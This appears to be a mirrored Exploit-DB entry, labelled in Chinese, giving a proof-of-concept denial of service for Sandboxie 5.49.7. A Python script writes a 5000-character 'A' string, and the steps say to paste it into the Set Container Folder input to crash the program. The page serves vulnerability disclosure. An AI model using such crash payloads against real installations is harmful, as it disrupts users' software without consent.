Sandboxie 5.49.7 – Denial of Service (PoC)

  • 作者: Erick Galindo
    日期: 2021-05-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49844/
  • # Exploit Title: Sandboxie 5.49.7 - Denial of Service (PoC)
    # Date: 06/05/2021
    # Author: Erick Galindo 
    # Vendor Homepage: https://sandboxie-plus.com/
    # Software https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Classic-x64-v5.49.7.exe
    # Version: 5.49.7
    # Tested on: Windows 10 Pro x64 es
    
    # Proof of Concept:
    #1.- Copy printed "AAAAA..." string to clipboard!
    #2.- Sandboxie Control->Sandbox->Set Container Folder
    #3.- Paste the buffer in the input then press ok
    
    buffer = "\x41" * 5000
    
    f = open ("Sandboxie10.txt", "w")
    f.write(buffer)
    f.close()